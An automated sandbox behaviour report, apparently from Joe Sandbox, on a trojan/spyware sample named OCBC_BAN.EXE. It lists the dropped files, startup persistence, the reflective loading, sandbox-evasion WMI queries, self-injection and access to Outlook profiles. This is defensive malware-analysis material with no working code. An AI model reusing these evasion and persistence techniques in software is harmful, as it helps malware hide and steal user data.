          Source: OCBC_BAN.EXE, 0000000C.00000002.635571105.00000000039D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClientPlugin.dll4 vs OCBC_BAN.EXE
          Source: OCBC_BAN.EXE, 0000000C.00000002.635571105.00000000039D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLzma#.dll4 vs OCBC_BAN.EXE
          Source: OCBC_BAN.EXE, 0000000C.00000002.635571105.00000000039D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs OCBC_BAN.EXE
          Source: OCBC_BAN.EXEBinary or memory string: OriginalFilenameWaxhxbwa.exe6 vs OCBC_BAN.EXE
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe 01E3C7651589A572C90A38AA1476BF4A50CCD35383FE3114BE11068D5C2A9E39
          Source: OCBC_BAN.EXEReversingLabs: Detection: 31%
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEFile read: C:\Users\user\Desktop\OCBC_BAN.EXEJump to behavior
          Source: OCBC_BAN.EXEStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\OCBC_BAN.EXE "C:\Users\user\Desktop\OCBC_BAN.EXE"
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 10
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess created: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe "C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe"
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess created: C:\Users\user\Desktop\OCBC_BAN.EXE C:\Users\user\Desktop\OCBC_BAN.EXE
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess created: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe "C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe"
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess created: C:\Users\user\Desktop\OCBC_BAN.EXE C:\Users\user\Desktop\OCBC_BAN.EXE
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 10
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\windscribeJump to behavior
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEFile created: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/5@3/3
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\OCBC_BAN.EXESection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\OCBC_BAN.EXESection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEMutant created: \Sessions\1\BaseNamedObjects\Global\{49b4bf8f-6f20-4306-8d82-ae70effc40f1}
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5556:120:WilError_01
          Source: Pubrtkzyqpdcef1.exe.0.dr, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: Pubrtkzyqpdcef1.exe.0.dr, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 9.0.Pubrtkzyqpdcef1.exe.e30000.3.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 9.0.Pubrtkzyqpdcef1.exe.e30000.3.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 9.2.Pubrtkzyqpdcef1.exe.e30000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 9.2.Pubrtkzyqpdcef1.exe.e30000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: OCBC_BAN.EXEStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: OCBC_BAN.EXEStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

          Data Obfuscation

          barindex
          Source: OCBC_BAN.EXE, dyrax.cs.Net Code: okxqd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: windscribe.exe.0.dr, dyrax.cs.Net Code: okxqd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.OCBC_BAN.EXE.820000.0.unpack, dyrax.cs.Net Code: okxqd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.OCBC_BAN.EXE.820000.0.unpack, dyrax.cs.Net Code: okxqd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\OCBC_BAN.EXECode function: 0_2_00F4CFC7 push 8B02AC5Ch; retf
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeCode function: 9_2_0693DD62 push 83623700h; ret
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeCode function: 9_2_0693E36C push esp; iretd
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeCode function: 9_2_0695EEA1 push es; retf
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\windscribe\windscribe.exeJump to dropped file
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEFile created: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeJump to dropped file

          Boot Survival

          barindex
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\windscribeJump to behavior
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\windscribe\windscribe.exeJump to behavior
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\windscribe\windscribe.exe\:Zone.Identifier:$DATAJump to behavior

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEFile opened: C:\Users\user\Desktop\OCBC_BAN.EXE:Zone.Identifier read attributes | delete
          Source: C:\Users\user\Desktop\OCBC_BAN.EXERegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Users\user\Desktop\OCBC_BAN.EXE TID: 6436Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\Desktop\OCBC_BAN.EXE TID: 5300Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\timeout.exe TID: 5040Thread sleep count: 62 > 30
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe TID: 6868Thread sleep count: 35 > 30
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe TID: 6868Thread sleep time: -32281802128991695s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe TID: 6860Thread sleep count: 4710 > 30
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe TID: 1800Thread sleep count: 3967 > 30
          Source: C:\Users\user\Desktop\OCBC_BAN.EXE TID: 6296Thread sleep time: -23980767295822402s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeWindow / User API: threadDelayed 4710
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeWindow / User API: threadDelayed 3967
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEWindow / User API: threadDelayed 3726
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEWindow / User API: threadDelayed 5720
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEWindow / User API: foregroundWindowGot 371
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEThread delayed: delay time: 922337203685477
          Source: Pubrtkzyqpdcef1.exe, 00000009.00000002.633430133.0000000001506000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
          Source: OCBC_BAN.EXE, 0000000C.00000002.633203616.0000000000D4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
          Source: OCBC_BAN.EXE, 00000000.00000002.533832064.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeCode function: 9_2_06935730 LdrInitializeThunk,
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEMemory written: C:\Users\user\Desktop\OCBC_BAN.EXE base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess created: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe "C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe"
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEProcess created: C:\Users\user\Desktop\OCBC_BAN.EXE C:\Users\user\Desktop\OCBC_BAN.EXE
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 10
          Source: OCBC_BAN.EXE, 0000000C.00000002.637688473.00000000061DE000.00000004.00000010.00020000.00000000.sdmp, OCBC_BAN.EXE, 0000000C.00000002.637734244.000000000655E000.00000004.00000010.00020000.00000000.sdmp, OCBC_BAN.EXE, 0000000C.00000002.634401808.0000000002B0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
          Source: OCBC_BAN.EXE, 0000000C.00000002.634375880.0000000002AEC000.00000004.00000800.00020000.00000000.sdmp, OCBC_BAN.EXE, 0000000C.00000002.634556764.0000000002C25000.00000004.00000800.00020000.00000000.sdmp, OCBC_BAN.EXE, 0000000C.00000002.635333321.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager|$
          Source: OCBC_BAN.EXE, 0000000C.00000002.634401808.0000000002B0B000.00000004.00000800.00020000.00000000.sdmp, OCBC_BAN.EXE, 0000000C.00000002.634125334.00000000029D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerx
          Source: OCBC_BAN.EXE, 0000000C.00000002.635333321.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerHa|l
          Source: C:\Users\user\Desktop\OCBC_BAN.EXEQueries volume information: C:\Users\user\Desktop\OCBC_BAN.EXE VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
